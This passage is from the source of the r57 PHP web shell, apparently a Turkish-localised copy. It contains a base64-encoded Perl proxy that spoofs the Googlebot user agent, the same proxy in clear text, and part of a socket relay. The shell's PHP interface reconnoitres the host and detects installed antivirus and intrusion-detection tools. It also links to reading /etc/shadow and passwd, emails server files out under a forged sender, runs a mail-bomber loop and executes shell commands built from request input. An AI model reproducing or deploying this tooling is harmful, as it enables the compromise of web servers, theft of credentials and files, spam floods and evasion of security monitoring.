  3823.  
  3824. while ($ch || $th) {
  3825.  
  3826. my $rin = "";
  3827.  
  3828. vec($rin, fileno($ch), 1) = 1 if $ch;
  3829.  
  3830. vec($rin, fileno($th), 1) = 1 if $th;
  3831.  
  3832. my($rout, $eout);
  3833.  
  3834. select($rout = $rin, undef, $eout = $rin, 120);
  3835.  
  3836. if (!$rout  &&  !$eout) {}
  3837.  
  3838. my $cbuffer = "";
  3839.  
  3840. my $tbuffer = "";
  3841.  
  3842. if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
  3843.  
  3844. my $result = sysread($ch, $tbuffer, 1024);
  3845.  
  3846. if (!defined($result)) {
  3847.  
  3848. print STDERR "$!\n";
  3849.  
  3850. exit 0;
  3851.  
  3852. }
  3853.  
  3854. if ($result == 0) { exit 0; }
  3855.  
  3856. }
  3857.  
  3858. if ($th  &&  (vec($eout, fileno($th), 1)  || vec($rout, fileno($th), 1))) {
  3859.  
  3860. my $result = sysread($th, $cbuffer, 1024);
  3861.  
  3862. if (!defined($result)) { print STDERR "$!\n"; exit 0; }
  3863.  
  3864. if ($result == 0) {exit 0;}
  3865.  
  3866. }
  3867.  
  3868. if ($fh  &&  $tbuffer) {(print $fh $tbuffer);}
  3869.  
  3870. while (my $len = length($tbuffer)) {
  3871.  
  3872. my $res = syswrite($th, $tbuffer, $len);
  3873.  
  3874. if ($res > 0) {$tbuffer = substr($tbuffer, $res);}
  3875.  
  3876. else {print STDERR "$!\n";}
  3877.  
  3878. }
  3879.  
  3880. while (my $len = length($cbuffer)) {
  3881.  
  3882. my $res = syswrite($ch, $cbuffer, $len);
  3883.  
  3884. if ($res > 0) {$cbuffer = substr($cbuffer, $res);}
  3885.  
  3886. else {print STDERR "$!\n";}
  3887.  
  3888. }}}
  3889.  
  3890.  
  3891.  
  3892.  
  3893.  
  3894. */
  3895.  
  3896.  
  3897.  
  3898. $prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
  3899.  
  3900. luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
  3901.  
  3902. 0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
  3903.  
  3904. UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
  3905.  
  3906. DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
  3907.  
  3908. AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
  3909.  
  3910. GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
  3911.  
  3912. cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
  3913.  
  3914. BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
  3915.  
  3916. AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
  3917.  
  3918. TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
  3919.  
  3920. eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
  3921.  
  3922. oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
  3923.  
  3924. VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
  3925.  
  3926. CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
  3927.  
  3928. b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
  3929.  
  3930. 0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
  3931.  
  3932. 9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
  3933.  
  3934. CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
  3935.  
  3936. aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
  3937.  
  3938. gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
  3939.  
  3940. 9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
  3941.  
  3942.  
  3943.  
  3944. /* ?ST SATIRIN KIRILMI? HAL? */
  3945.  
  3946. /*
  3947.  
  3948.  
  3949.  
  3950. #!usr/bin/perl
  3951.  
  3952. use Socket;
  3953.  
  3954. my $port = $ARGV[0]||31337;
  3955.  
  3956. my $protocol = getprotobyname('tcp');
  3957.  
  3958. my $my_addr  = sockaddr_in ($port, INADDR_ANY);
  3959.  
  3960. socket (SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket(): $!";
  3961.  
  3962. setsockopt (SOCK, SOL_SOCKET, SO_REUSEADDR,1 ) or die "setsockopt(): $!";
  3963.  
  3964. bind (SOCK, $my_addr) or die "bind(): $!";
  3965.  
  3966. listen (SOCK, SOMAXCONN) or die "listen(): $!";
  3967.  
  3968. $SIG{'INT'} = sub {
  3969.  
  3970. close (SOCK);
  3971.  
  3972. exit;
  3973.  
  3974. };
  3975.  
  3976. while (1) {
  3977.  
  3978. next unless my $remote_addr = accept (SESSION, SOCK);
  3979.  
  3980. my ($fist, $method, $remote_host, $remote_port) = analyze_request();
  3981.  
  3982. if(open_connection (REMOTE, $remote_host, $remote_port) == 0) {
  3983.  
  3984. close (SESSION);
  3985.  
  3986. next;
  3987.  
  3988. }
  3989.  
  3990. print REMOTE $first;
  3991.  
  3992. print REMOTE "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
  3993.  
  3994. while (<SESSION>) {
  3995.  
  3996. next if (/Proxy-Connection:/ || /User-Agent:/);
  3997.  
  3998. print REMOTE $_;
  3999.  
  4000. last if ($_ =~ /^[\s\x00]*$/);
  4001.  
  4002. }
  4003.  
  4004. print REMOTE "\n";
  4005.  
  4006. $header = 1;
  4007.  
  4008. while (<REMOTE>) {
  4009.  
  4010. print SESSION $_;
  4011.  
  4012. if ($header) {    
  4013.  
  4014. if ($header && $_ =~ /^[\s\x00]*$/) {
  4015.  
  4016. $header = 0;
  4017.  
  4018. }
  4019.  
  4020. }
  4021.  
  4022. }
  4023.  
  4024. close (REMOTE);
  4025.  
  4026. close (SESSION);
  4027.  
  4028. }
  4029.  
  4030. close (SOCK);
  4031.  
  4032. sub analyze_request {
  4033.  
  4034. my ($fist, $url, $remote_host, $remote_port, $method);
  4035.  
  4036. $first = <SESSION>;
  4037.  
  4038. $url = ($first =~ m|(http://\S+)|)[0];
  4039.  
  4040. ($method, $remote_host, $remote_port) =
  4041.  
  4042. ($first =~ m!(GET) http://([^/:]+):?(\d*)! );
  4043.  
  4044. if (!$remote_host) {
  4045.  
  4046. close(SESSION);
  4047.  
  4048. exit;
  4049.  
  4050. }
  4051.  
  4052. $remote_port = "http" unless ($remote_port);
  4053.  
  4054. $first =~ s/http:\/\/[^\/]+//;
  4055.  
  4056. return ($first, $method, $remote_host, $remote_port);
  4057.  
  4058. }
  4059.  
  4060. sub open_connection {
  4061.  
  4062. my ($host, $port) = @_[1,2];
  4063.  
  4064. my ($dest_addr, $cur);
  4065.  
  4066. if ($port !~ /^\d+$/) {
  4067.  
  4068. $port = (getservbyname($port, "tcp"))[2];
  4069.  
  4070. $port = 80 unless ($port);
  4071.  
  4072. }
  4073.  
  4074. $host = inet_aton ($host) or return 0;
  4075.  
  4076. $dest_addr = sockaddr_in ($port, $host);
  4077.  
  4078. socket ($_[0], AF_INET, SOCK_STREAM, $protocol) or die "socket() : $!";
  4079.  
  4080. connect ($_[0], $dest_addr) or return 0;
  4081.  
  4082. $cur = select($_[0]);  
  4083.  
  4084. $| = 1;
  4085.  
  4086. select($cur);
  4087.  
  4088. return 1;
  4089.  
  4090. }
  4091.  
  4092.  
  4093.  
  4094. */
  4095.  
  4096.  
  4097.  
  4098.  
  4099.  
  4100. if($unix)
  4101.  
  4102. {
  4103.  
  4104. if(!isset($_COOKIE['uname'])) {$uname = ex('uname -a');setcookie('uname',$uname);}else {$uname = $_COOKIE['uname'];}
  4105.  
  4106. if(!isset($_COOKIE['id'])) {$id = ex('id');setcookie('id',$id);}else {$id = $_COOKIE['id'];}
  4107.  
  4108. if($safe_mode) {$sysctl = '-';}
  4109.  
  4110. else if(isset($_COOKIE['sysctl'])) {$sysctl = $_COOKIE['sysctl'];}
  4111.  
  4112. else  
  4113.  
  4114. {
  4115.  
  4116. $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
  4117.  
  4118. if(empty($sysctl)) {$sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease');}
  4119.  
  4120. if(empty($sysctl)) {$sysctl = '-';}
  4121.  
  4122. setcookie('sysctl',$sysctl);
  4123.  
  4124. }
  4125.  
  4126. }
  4127.  
  4128. echo $head;
  4129.  
  4130. echo '</head>';
  4131.  
  4132. echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333 width=160><font face=Verdana size=2>'.ws(2).'<font face=tahoma size=2><b>r57 shell '.$version.'</b></font></td><td bgcolor=#333333><font face=Verdana size=-2>';
  4133.  
  4134. echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
  4135.  
  4136. if(isset($_SERVER['X_FORWARDED_FOR'])){echo " X_FORWARDED_FOR: [<font color=red>".$_SERVER['X_FORWARDED_FOR']."</font>]";}
  4137.  
  4138. if(isset($_SERVER['CLIENT_IP'])){echo " CLIENT_IP: [<font color=red>".$_SERVER['CLIENT_IP']."</font>]";}
  4139.  
  4140. echo " Server IP: [<a href=".gethostbyname($_SERVER["HTTP_HOST"])." target=iframe><font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font></a>]";
  4141.  
  4142. echo "<br>";
  4143.  
  4144. echo ws(2)."PHP version: <b>".@phpversion()."</b>";
  4145.  
  4146. $curl_on = @function_exists('curl_version');
  4147.  
  4148. echo ws(2);
  4149.  
  4150. echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>Kapali</font>"));
  4151.  
  4152. echo "</b>".ws(2);
  4153.  
  4154. echo "MySQL: <b>";
  4155.  
  4156. $mysql_on = @function_exists('mysql_connect');
  4157.  
  4158. if($mysql_on){
  4159.  
  4160. echo "<font color=green>ON</font>";}else {echo "<font color=red>Kapali</font>";}
  4161.  
  4162. echo "</b>".ws(2);
  4163.  
  4164. echo "MSSQL: <b>";
  4165.  
  4166. $mssql_on = @function_exists('mssql_connect');
  4167.  
  4168. if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>Kapali</font>";}
  4169.  
  4170. echo "</b>".ws(2);
  4171.  
  4172. echo "PostgreSQL: <b>";
  4173.  
  4174. $pg_on = @function_exists('pg_connect');
  4175.  
  4176. if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>Kapali</font>";}
  4177.  
  4178. echo "</b>".ws(2);
  4179.  
  4180. echo "Oracle: <b>";
  4181.  
  4182. $ora_on = @function_exists('ocilogon');
  4183.  
  4184. if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>Kapali</font>";}
  4185.  
  4186. echo "</b><br>".ws(2);
  4187.  
  4188. echo "Safe_mode: <b>";
  4189.  
  4190. echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>Kapali</font>"));
  4191.  
  4192. echo "</b>".ws(2);
  4193.  
  4194. echo "Open_basedir: <b>";
  4195.  
  4196. if($open_basedir) {if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=green>$df</font></b>";};}
  4197.  
  4198. else {echo "<font color=red>NONE</font></b>";}
  4199.  
  4200. echo ws(2)."Safe_mode_exec_dir: <b>";
  4201.  
  4202. if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
  4203.  
  4204. else {echo "<font color=red>ini_get disable!</font></b>";}
  4205.  
  4206. echo ws(2)."Safe_mode_include_dir: <b>";
  4207.  
  4208. if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
  4209.  
  4210. else {echo "<font color=red>ini_get disable!</font></b>";}
  4211.  
  4212. echo "<br>".ws(2);
  4213.  
  4214. echo "Disable functions : <b>";$df='ini_get  disable!';
  4215.  
  4216. if((@function_exists('ini_get')) &&(''==($df=@ini_get('disable_functions')))){echo "<font color=red>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
  4217.  
  4218. $free = @diskfreespace($dir);
  4219.  
  4220. if (!$free) {$free = 0;}
  4221.  
  4222. $all = @disk_total_space($dir);
  4223.  
  4224. if (!$all) {$all = 0;}
  4225.  
  4226. echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
  4227.  
  4228. $ust='';
  4229.  
  4230. if($unix &&!$safe_mode){
  4231.  
  4232. if (which('gcc')) {$ust.="gcc,";}
  4233.  
  4234. if (which('cc')) {$ust.="cc,";}
  4235.  
  4236. if (which('ld')) {$ust.="ld,";}
  4237.  
  4238. if (which('php')) {$ust.="php,";}
  4239.  
  4240. if (which('perl')) {$ust.="perl,";}
  4241.  
  4242. if (which('python')) {$ust.="python,";}
  4243.  
  4244. if (which('ruby')) {$ust.="ruby,";}
  4245.  
  4246. if (which('make')) {$ust.="make,";}
  4247.  
  4248. if (which('tar')) {$ust.="tar,";}
  4249.  
  4250. if (which('nc')) {$ust.="netcat,";}
  4251.  
  4252. if (which('locate')) {$ust.="locate,";}
  4253.  
  4254. if (which('suidperl')) {$ust.="suidperl,";}
  4255.  
  4256. }
  4257.  
  4258. if (@function_exists('pcntl_exec')) {$ust.="pcntl_exec,";}
  4259.  
  4260. if($ust){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust."</font>";}
  4261.  
  4262. $ust='';
  4263.  
  4264. if($unix &&!$safe_mode){
  4265.  
  4266. if (which('kav')) {$ust.="kav,";}
  4267.  
  4268. if (which('nod32')) {$ust.="nod32,";}
  4269.  
  4270. if (which('bdcored')) {$ust.="bitdefender,";}
  4271.  
  4272. if (which('uvscan')) {$ust.="mcafee,";}
  4273.  
  4274. if (which('sav')) {$ust.="symantec,";}
  4275.  
  4276. if (which('drwebd')) {$ust="drwebd,";}
  4277.  
  4278. if (which('clamd')) {$ust.="clamd,";}
  4279.  
  4280. if (which('rkhunter')) {$ust.="rkhunter,";}
  4281.  
  4282. if (which('chkrootkit')) {$ust.="chkrootkit,";}
  4283.  
  4284. if (which('iptables')) {$ust.="iptables,";}
  4285.  
  4286. if (which('ipfw')) {$ust.="ipfw,";}
  4287.  
  4288. if (which('tripwire')) {$ust.="tripwire,";}
  4289.  
  4290. if (which('shieldcc')) {$ust.="stackshield,";}
  4291.  
  4292. if (which('portsentry')) {$ust.="portsentry,";}
  4293.  
  4294. if (which('snort')) {$ust.="snort,";}
  4295.  
  4296. if (which('ossec')) {$ust.="ossec,";}
  4297.  
  4298. if (which('lidsadm')) {$ust.="lidsadm,";}
  4299.  
  4300. if (which('tcplodg')) {$ust.="tcplodg,";}
  4301.  
  4302. if (which('tripwire')) {$ust.="tripwire,";}
  4303.  
  4304. if (which('sxid')) {$ust.="sxid,";}
  4305.  
  4306. if (which('logcheck')) {$ust.="logcheck,";}
  4307.  
  4308. if (which('logwatch')) {$ust.="logwatch,";}
  4309.  
  4310. }
  4311.  
  4312. if (@function_exists('apache_get_modules') &&@in_array('mod_security',apache_get_modules())) {$ust.="mod_security,";}
  4313.  
  4314. if($ust){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>$ust</font>";}
  4315.  
  4316. echo "<br>".ws(2)."</b>";
  4317.  
  4318. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
  4319.  
  4320. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
  4321.  
  4322. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
  4323.  
  4324. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
  4325.  
  4326. if(!$unix) {
  4327.  
  4328. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?systeminfo title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
  4329.  
  4330. }else{
  4331.  
  4332. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?syslog title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
  4333.  
  4334. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?resolv title=\"View resolv\"><b>resolv</b></a> ".$rb;
  4335.  
  4336. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?hosts title=\"View hosts\"><b>hosts</b></a> ".$rb;
  4337.  
  4338. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?shadow title=\"View shadow\"><b>shadow</b></a> ".$rb;
  4339.  
  4340. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?passwd title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;
  4341.  
  4342. }
  4343.  
  4344. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
  4345.  
  4346. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;
  4347.  
  4348. if($unix &&!$safe_mode)
  4349.  
  4350. {
  4351.  
  4352. echo "<br>".ws(2)."</b>";
  4353.  
  4354. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?procinfo title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
  4355.  
  4356. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?version title=\"View proc version\"><b>version</b></a> ".$rb;
  4357.  
  4358. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?free title=\"View mem free\"><b>free</b></a> ".$rb;
  4359.  
  4360. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?dmesg(8) title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
  4361.  
  4362. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?vmstat title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
  4363.  
  4364. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lspci title=\"View lspci\"><b>lspci</b></a> ".$rb;
  4365.  
  4366. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsdev title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
  4367.  
  4368. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?interrupts title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
  4369.  
  4370. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise1 title=\"View realise1\"><b>realise1</b></a> ".$rb;
  4371.  
  4372. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise2 title=\"View realise2\"><b>realise2</b></a> ".$rb;
  4373.  
  4374. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsattr title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
  4375.  
  4376. echo "<br>".ws(2)."</b>";
  4377.  
  4378. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?w title=\"View w\"><b>w</b></a> ".$rb;
  4379.  
  4380. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?who title=\"View who\"><b>who</b></a> ".$rb;
  4381.  
  4382. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?uptime title=\"View uptime\"><b>uptime</b></a> ".$rb;
  4383.  
  4384. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?last title=\"View last -n 10\"><b>last</b></a> ".$rb;
  4385.  
  4386. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?psaux title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
  4387.  
  4388. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?service title=\"View service\"><b>service</b></a> ".$rb;
  4389.  
  4390. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ifconfig title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;
  4391.  
  4392. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?netstat title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
  4393.  
  4394. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fstab title=\"View fstab\"><b>fstab</b></a> ".$rb;
  4395.  
  4396. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fdisk title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
  4397.  
  4398. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?df title=\"View df -h\"><b>df -h</b></a> ".$rb;
  4399.  
  4400. }
  4401.  
  4402. echo '</font></td></tr><table>
  4403.  
  4404. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000>
  4405.  
  4406. <tr><td align=right width=100>';
  4407.  
  4408. echo $font;
  4409.  
  4410. if($unix){
  4411.  
  4412. echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
  4413.  
  4414. echo "</td><td>";
  4415.  
  4416. echo "<font face=Verdana size=-2 color=red><b>";
  4417.  
  4418. echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
  4419.  
  4420. echo ws(3).$sysctl."<br>";
  4421.  
  4422. echo ws(3).ex('echo $OSTYPE')."<br>";
  4423.  
  4424. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
  4425.  
  4426. if(!empty($id)) {echo ws(3).$id."<br>";}
  4427.  
  4428. else if(@function_exists('posix_geteuid') &&@function_exists('posix_getegid') &&@function_exists('posix_getgrgid') &&@function_exists('posix_getpwuid'))
  4429.  
  4430. {
  4431.  
  4432. $euserinfo  = @posix_getpwuid(@posix_geteuid());
  4433.  
  4434. $egroupinfo = @posix_getgrgid(@posix_getegid());
  4435.  
  4436. echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
  4437.  
  4438. }
  4439.  
  4440. else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
  4441.  
  4442. echo ws(3).$dir;
  4443.  
  4444. echo ws(3).'( '.perms(@fileperms($dir)).' )';
  4445.  
  4446. echo "</b></font>";
  4447.  
  4448. }
  4449.  
  4450. else
  4451.  
  4452. {
  4453.  
  4454. echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
  4455.  
  4456. echo "</td><td>";
  4457.  
  4458. echo "<font face=Verdana size=-2 color=red><b>";
  4459.  
  4460. echo ws(3).@substr(@php_uname(),0,120)."<br>";
  4461.  
  4462. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
  4463.  
  4464. echo ws(3).@getenv("USERNAME")."<br>";
  4465.  
  4466. echo ws(3).$dir;
  4467.  
  4468. echo "<br></font>";
  4469.  
  4470. }
  4471.  
  4472. echo "</font>";
  4473.  
  4474. echo "</td></tr></table>";
  4475.  
  4476. if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail")
  4477.  
  4478. {
  4479.  
  4480. $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
  4481.  
  4482. err(6+$res);
  4483.  
  4484. $_POST['cmd']="";
  4485.  
  4486. }
  4487.  
  4488. if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_file"&&!empty($_POST['loc_file']))
  4489.  
  4490. {
  4491.  
  4492. if($file=@fopen($_POST['loc_file'],"r")){$filedump = @fread($file,@filesize($_POST['loc_file']));@fclose($file);}
  4493.  
  4494. else if ($file=readzlib($_POST['loc_file'])) {$filedump = $file;}else {err(1,$_POST['loc_file']);$_POST['cmd']="";}
  4495.  
  4496. if(isset($_POST['cmd']))
  4497.  
  4498. {
  4499.  
  4500. $filename = @basename($_POST['loc_file']);
  4501.  
  4502. $content_encoding=$mime_type='';
  4503.  
  4504. compress($filename,$filedump,$_POST['compress']);
  4505.  
  4506. $attach = array(
  4507.  
  4508. "name"=>$filename,
  4509.  
  4510. "type"=>$mime_type,
  4511.  
  4512. "content"=>$filedump
  4513.  
  4514. );
  4515.  
  4516. if(empty($_POST['subj'])) {$_POST['subj'] = 'file from r57';}
  4517.  
  4518. if(empty($_POST['from'])) {$_POST['from'] = 'billy@microsoft.com';}
  4519.  
  4520. $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
  4521.  
  4522. err(6+$res);
  4523.  
  4524. $_POST['cmd']="";
  4525.  
  4526. }
  4527.  
  4528. }
  4529.  
  4530. if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_bomber"&&!empty($_POST['mail_flood']) &&!empty($_POST['mail_size']))
  4531.  
  4532. {
  4533.  
  4534. for($h=1;$h<=$_POST['mail_flood'];$h++){
  4535.  
  4536. $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ",1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
  4537.  
  4538. }
  4539.  
  4540. err(6+$res);
  4541.  
  4542. $_POST['cmd']="";
  4543.  
  4544. }
  4545.  
  4546. if(!empty($_POST['cmd']) &&$_POST['cmd'] == "find_text")
  4547.  
  4548. {
  4549.  
  4550. $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
  4551.  
  4552. }
  4553.  
  4554. if(!empty($_POST['cmd']) &&$_POST['cmd']=="ch_")
  4555.  
  4556. {
  4557.  
  4558. switch($_POST['what'])
  4559.  
  4560. {
  4561.  
  4562. case 'own':
  4563.  
  4564. @chown($_POST['param1'],$_POST['param2']);
  4565.  
  4566. break;
  4567.  
  4568. case 'grp':
  4569.  
  4570. @chgrp($_POST['param1'],$_POST['param2']);
  4571.  
  4572. break;
  4573.  
